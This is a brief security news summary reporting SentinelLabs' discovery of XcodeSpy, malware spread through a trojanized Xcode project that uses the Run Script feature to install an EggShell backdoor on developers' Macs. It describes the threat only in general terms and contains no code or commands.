"New Malware Uses Malicious Xcode Project to Install Backdoors on Developer Macs"
Security researchers at SentinelLabs have discovered a new malware called XcodeSpy that targets Xcode developers. XcodeSpy impacts the Xcode integrated development environment (IDE) on macOS. Xcode is a coding platform that allows developers to create Apple Store applications for iPhone, Mac, and other Apple devices. According to the researchers, malicious actors are abusing the IDE's Run Script feature to infect those using shared Xcode projects. They discovered a trojanized version of the legitimate iOS TabBarInjection Xcode project. When the project is downloaded and launched, it installs a custom variant of the EggShell backdoor that allows attackers to upload files, download files, record a victim's microphone, and more. This article continues to discuss the capabilities, distribution, targets, and potential impact of the new XcodeSpy malware.